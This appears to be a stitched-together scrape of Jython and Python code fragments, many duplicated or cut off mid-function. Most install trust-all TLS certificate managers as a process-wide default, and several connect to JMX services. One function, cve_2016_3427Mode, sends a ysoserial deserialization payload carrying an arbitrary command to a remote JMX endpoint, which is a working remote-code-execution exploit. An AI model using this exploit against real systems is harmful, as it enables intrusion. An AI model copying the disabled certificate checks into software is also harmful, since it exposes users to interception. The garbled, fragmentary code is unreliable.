def connectToJMX(args):
# Basic JMX connection, always required
trust_managers = array([TrustAllX509TrustManager()], TrustManager)
sc = SSLContext.getInstance("SSL")
sc.init(None, trust_managers, None)
SSLContext.setDefault(sc)
jmx_url = JMXServiceURL("service:jmx:rmi:///jndi/rmi://" +
args.targetHost + ":" + args.targetPort +
"/jmxrmi")
print "[+] Connecting to: " + str(jmx_url)
try:
# for passing credentials for password
if args.jmxpassword and args.jmxrole:
print("[+] Using credentials: " + str(args.jmxrole) + " / " +
str(args.jmxpassword))
credentials = array([args.jmxrole, args.jmxpassword], String)
environment = {JMXConnector.CREDENTIALS: credentials}
jmx_connector = JMXConnectorFactory.connect(jmx_url, environment)
else:
jmx_connector = JMXConnectorFactory.connect(jmx_url)
print "[+] Connected: " + str(jmx_connector.getConnectionId())
bean_server = jmx_connector.getMBeanServerConnection()
return bean_server
except:
print "[-] Error: Can't connect to remote service"
if "Authentication failed! Invalid username or password" in str(
sys.exc_info()[1]):
print "[-] Authentication failed! Invalid username or password"
sys.exit(-1)
def trust_all_certs():
# Create a static reference to an SSLContext which will use
# our custom TrustManager
trust_managers = array([TrustAllX509TrustManager()], TrustManager)
TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL")
TRUST_ALL_CONTEXT.init(None, trust_managers, None)
SSLContext.setDefault(TRUST_ALL_CONTEXT)
def disable_all_ssl_cert_checks(self):
from javax.net.ssl import TrustManager, X509TrustManager
from jarray import array
from javax.net.ssl import SSLContext
class TrustAllX509TrustManager(X509TrustManager):
"""
Define a custom TrustManager which will blindly accept all certificates
"""
def checkClientTrusted(self, chain, auth):
pass
def checkServerTrusted(self, chain, auth):
pass
def getAcceptedIssuers(self):
return None
# Create a static reference to an SSLContext which will use
# our custom TrustManager
self.log.info("Disabling cert check ##############")
trust_managers = array([TrustAllX509TrustManager()], TrustManager)
TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL")
TRUST_ALL_CONTEXT.init(None, trust_managers, None)
SSLContext.setDefault(TRUST_ALL_CONTEXT)
# Keep a static reference to the JVM's default SSLContext for restoring
# at a later time
DEFAULT_CONTEXT = SSLContext.getDefault()
def _enableTrustAllCertificates(cls, enable=True):
logger.info('Enable trust all certs')
cls.initSSL()
from javax.net.ssl import SSLContext
if enable and TrustAllCert.TRUST_ALL_CONTEXT:
SSLContext.setDefault(TrustAllCert.TRUST_ALL_CONTEXT)
elif TrustAllCert.DEFAULT_CONTEXT:
SSLContext.setDefault(TrustAllCert.DEFAULT_CONTEXT)
def _enableTrustAllCertificates(cls, enable=True):
logger.info('Enable trust all certs')
cls.initSSL()
from javax.net.ssl import SSLContext
if enable and TrustAllCert.TRUST_ALL_CONTEXT:
SSLContext.setDefault(TrustAllCert.TRUST_ALL_CONTEXT)
elif TrustAllCert.DEFAULT_CONTEXT:
SSLContext.setDefault(TrustAllCert.DEFAULT_CONTEXT)
def trust_all_certificates():
"""Blindly trusts all certificates; note this is a per-JVM process setting."""
if not TrustAllCertificates._blind_trust:
print >> sys.stderr, "Trusting all certificates without verifying them for this process."
print >> sys.stderr, "It would be best to install certificates in the JVM's trust store."
print >> sys.stderr, "Currently there is no way to turn this off."
trust_managers = array(TrustManager, [TrustAllX509TrustManager()])
trust_all_context = SSLContext.getInstance("SSL")
trust_all_context.init(None, trust_managers, None)
SSLContext.setDefault(trust_all_context)
TrustAllCertificates._blind_trust = True
def wrapped(*args, **kwargs):
# Only do this if running under Jython
if 'java' in sys.platform:
from javax.net.ssl import SSLContext
SSLContext.setDefault(TRUST_ALL_CONTEXT)
try:
res = f(*args, **kwargs)
return res
finally:
SSLContext.setDefault(DEFAULT_CONTEXT)
else:
return f(*args, **kwargs)
def wrapped(*args, **kwargs):
# Only do this if running under Jython
if 'java' in sys.platform:
from javax.net.ssl import SSLContext
SSLContext.setDefault(TRUST_ALL_CONTEXT)
try:
res = f(*args, **kwargs)
return res
finally:
SSLContext.setDefault(DEFAULT_CONTEXT)
else:
return f(*args, **kwargs)
def trust_all_certificates():
"""Blindly trusts all certificates; note this is a per-JVM process setting."""
global _blind_trust
if not _blind_trust:
print >> sys.stderr, "Trusting all certificates without verifying them for this process."
print >> sys.stderr, "It would be best to install certificates in the JVM's trust store."
print >> sys.stderr, "Currently there is no way to turn this off."
trust_managers = array(TrustManager, [TrustAllX509TrustManager()])
trust_all_context = SSLContext.getInstance("SSL")
trust_all_context.init(None, trust_managers, None)
SSLContext.setDefault(trust_all_context)
_blind_trust = True
def trust_all_certificates(request):
'''Decorator function that will make it so the context of the decorated
method will run with our TrustManager that accepts all certificates'''
# Only do this if running under Jython
is_java = 'java' in sys.platform
if is_java:
from javax.net.ssl import SSLContext
SSLContext.setDefault(TRUST_ALL_CONTEXT)
def fin():
if is_java:
SSLContext.setDefault(DEFAULT_CONTEXT)
request.addfinalizer(fin)
def trust_all_certificates(request):
'''Decorator function that will make it so the context of the decorated
method will run with our TrustManager that accepts all certificates'''
# Only do this if running under Jython
is_java = 'java' in sys.platform
if is_java:
from javax.net.ssl import SSLContext
SSLContext.setDefault(TRUST_ALL_CONTEXT)
def fin():
if is_java:
SSLContext.setDefault(DEFAULT_CONTEXT)
request.addfinalizer(fin)
def trustSpecificCertificate(self, pemCertificateFile, pemCertificateAlias):
from java.io import BufferedInputStream, FileInputStream
from java.security import KeyStore
from java.security.cert import CertificateFactory, X509Certificate
from javax.net.ssl import SSLContext, TrustManagerFactory
fis = FileInputStream(pemCertificateFile)
bis = BufferedInputStream(fis)
ca = CertificateFactory.getInstance("X.509").generateCertificate(bis)
ks = KeyStore.getInstance(KeyStore.getDefaultType())
ks.load(None, None)
ks.setCertificateEntry(pemCertificateAlias, ca)
tmf = TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm())
tmf.init(ks)
context = SSLContext.getInstance("SSL")
context.init(None, tmf.getTrustManagers(), None)
SSLContext.setDefault(context)
def trustAllCertificate(self):
from javax.net.ssl import TrustManager, X509TrustManager
from jarray import array
from javax.net.ssl import SSLContext
class TrustAllX509TrustManager(X509TrustManager):
def checkClientTrusted(self, chain, auth):
pass
def checkServerTrusted(self, chain, auth):
pass
def getAcceptedIssuers(self):
return None
trust_managers = array([TrustAllX509TrustManager()], TrustManager)
TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL")
TRUST_ALL_CONTEXT.init(None, trust_managers, None)
SSLContext.setDefault(TRUST_ALL_CONTEXT)
def connectToJMX(args):
# Basic JMX connection, always required
trust_managers = array([TrustAllX509TrustManager()], TrustManager)
sc = SSLContext.getInstance("SSL")
sc.init(None, trust_managers, None)
SSLContext.setDefault(sc)
if args.jmxmp:
jmx_url = jmxmp_url(args)
else:
jmx_url = jxmrmi_url(args)
# import after url in order to import the correct protocol implementation
from javax.management.remote import JMXConnector
from javax.management.remote import JMXConnectorFactory
print "[+] Connecting to: " + str(jmx_url)
try:
# for passing credentials for password
if args.jmxpassword and args.jmxrole:
print("[+] Using credentials: " + str(args.jmxrole) + " / " +
str(args.jmxpassword))
credentials = array([args.jmxrole, args.jmxpassword], String)
environment = {JMXConnector.CREDENTIALS: credentials}
jmx_connector = JMXConnectorFactory.connect(jmx_url, environment)
else:
jmx_connector = JMXConnectorFactory.connect(jmx_url)
print "[+] Connected: " + str(jmx_connector.getConnectionId())
bean_server = jmx_connector.getMBeanServerConnection()
return bean_server
except:
print "[-] Error: Can't connect to remote service"
if "Authentication failed! Invalid username or password" in str(
sys.exc_info()[1]):
print "[-] Authentication failed! Invalid username or password"
if "Connection refused to host: 127.0.0.1" in str(sys.exc_info()):
print "[-] Connection refused to 127.0.0.1! Try the localhost_bypass"
sys.exit(-1)
def connectToJMX(args):
# Basic JMX connection, always required
trust_managers = array([TrustAllX509TrustManager()], TrustManager)
sc = SSLContext.getInstance("SSL")
sc.init(None, trust_managers, None)
SSLContext.setDefault(sc)
jmx_url = JMXServiceURL("service:jmx:rmi:///jndi/rmi://" +
args.targetHost + ":" + args.targetPort +
"/jmxrmi")
print "[+] Connecting to: " + str(jmx_url)
try:
jmx_connector = JMXConnectorFactory.connect(jmx_url)
print "[+] Connected: " + str(jmx_connector.getConnectionId())
bean_server = jmx_connector.getMBeanServerConnection()
return bean_server
except IOException:
print "[-] Error: Can't connect to remote service"
sys.exit(-1)
def trustAllCertificate(self):
from javax.net.ssl import TrustManager, X509TrustManager
from jarray import array
from javax.net.ssl import SSLContext
class TrustAllX509TrustManager(X509TrustManager):
def checkClientTrusted(self, chain, auth):
pass
def checkServerTrusted(self, chain, auth):
pass
def getAcceptedIssuers(self):
return None
trust_managers = array([TrustAllX509TrustManager()], TrustManager)
TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL")
TRUST_ALL_CONTEXT.init(None, trust_managers, None)
SSLContext.setDefault(TRUST_ALL_CONTEXT)
def trustSpecificCertificate(self, pemCertificateFile,
pemCertificateAlias):
from java.io import BufferedInputStream, FileInputStream
from java.security import KeyStore
from java.security.cert import CertificateFactory, X509Certificate
from javax.net.ssl import SSLContext, TrustManagerFactory
fis = FileInputStream(pemCertificateFile)
bis = BufferedInputStream(fis)
ca = CertificateFactory.getInstance("X.509").generateCertificate(bis)
ks = KeyStore.getInstance(KeyStore.getDefaultType())
ks.load(None, None)
ks.setCertificateEntry(pemCertificateAlias, ca)
tmf = TrustManagerFactory.getInstance(
TrustManagerFactory.getDefaultAlgorithm())
tmf.init(ks)
context = SSLContext.getInstance("SSL")
context.init(None, tmf.getTrustManagers(), None)
SSLContext.setDefault(context)
def cve_2016_3427Mode(args):
if not os.path.isfile('./jars/ysoserial.jar'):
print "[-] Error: Did not find ysoserial.jar in jars directory. Please download it from https://github.com/frohoff/ysoserial and move it in the jars directory"
sys.exit(1)
sys.path.append("./jars/ysoserial.jar")
print "[+] Added ysoserial API capacities"
from ysoserial.payloads.ObjectPayload import Utils
payload_object = Utils.makePayloadObject(args.gadget, args.cmd)
trust_managers = array([TrustAllX509TrustManager()], TrustManager)
sc = SSLContext.getInstance("SSL")
sc.init(None, trust_managers, None)
SSLContext.setDefault(sc)
from javax.management.remote import JMXConnector
from javax.management.remote import JMXConnectorFactory
jmx_url = jxmrmi_url(args)
print "[+] Connecting to: " + str(jmx_url)
try:
environment = {JMXConnector.CREDENTIALS: payload_object}
jmx_connector = JMXConnectorFactory.connect(jmx_url, environment)
except:
if "java.io.InvalidClassException: filter status: REJECTED" in str(
sys.exc_info()):
print "[-] Not vulnerable"
elif "Credentials should be String[]" in str(sys.exc_info()):
print "[+] Object was deserialized, target could be vulnerable"
print "[?]: Returned error: "
print str(sys.exc_info())
print "[+] Done"
def fin():
if is_java:
SSLContext.setDefault(DEFAULT_CONTEXT)
def enableTrustAllCertificates(cls):
logger.info('Enable trust all certs')
cls.initSSL()
from javax.net.ssl import SSLContext
SSLContext.setDefault(TrustAllCert.TRUST_ALL_CONTEXT)
class TrustAllX509TrustManager(X509TrustManager):
'''Define a custom TrustManager which will blindly accept all certificates'''
def checkClientTrusted(self, chain, auth):
pass
def checkServerTrusted(self, chain, auth):
pass
def getAcceptedIssuers(self):
return None
# Create a static reference to an SSLContext which will use
# our custom TrustManager
trust_managers = array([TrustAllX509TrustManager()], TrustManager)
TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL")
TRUST_ALL_CONTEXT.init(None, trust_managers, None)
SSLContext.setDefault(TRUST_ALL_CONTEXT)
class TestClient(threading.Thread):
TOTAL_COUNT = 0
IS_EXIT = False
def __init__(self, host, port=None):
threading.Thread.__init__(self, name=threading.active_count())
self.host = host
self.port = port
self.conn = HTTPSConnection(self.host, self.port,
timeout=ARGS.BATCH_SIZE*ARGS.BATCHES/2)
self.count = 0
#random.shuffle(TestClient.ids)
self.ids = list(TestClient.ids)
print(self.ids[0])
def enableTrustAllCertificates(cls):
logger.info('Enable trust all certs')
cls.initSSL()
from javax.net.ssl import SSLContext
SSLContext.setDefault(TrustAllCert.TRUST_ALL_CONTEXT)
def fin():
if is_java:
SSLContext.setDefault(DEFAULT_CONTEXT)
pass
def getAcceptedIssuers(self):
return None
# Create a static reference to an SSLContext which will use
# our custom TrustManager
trust_managers = array([TrustAllX509TrustManager()], TrustManager)
TRUST_ALL_CONTEXT = SSLContext.getInstance("SSL")
TRUST_ALL_CONTEXT.init(None, trust_managers, None)
# Keep a static reference to the JVM's default SSLContext for restoring
# at a later time
DEFAULT_CONTEXT = SSLContext.getDefault()
if 'create_default_context' not in dir(ssl):
SSLContext.setDefault(TRUST_ALL_CONTEXT)
except:
pass
def urlopen(request, verify):
ctx = None
if 'create_default_context' in dir(ssl):
ctx = ssl.create_default_context()
elif 'SSLContext' in dir(ssl) and 'PROTOCOL_TLSv1' in dir(ssl):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
if not verify and ctx:
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
return urllib_request.urlopen(request, context=ctx)
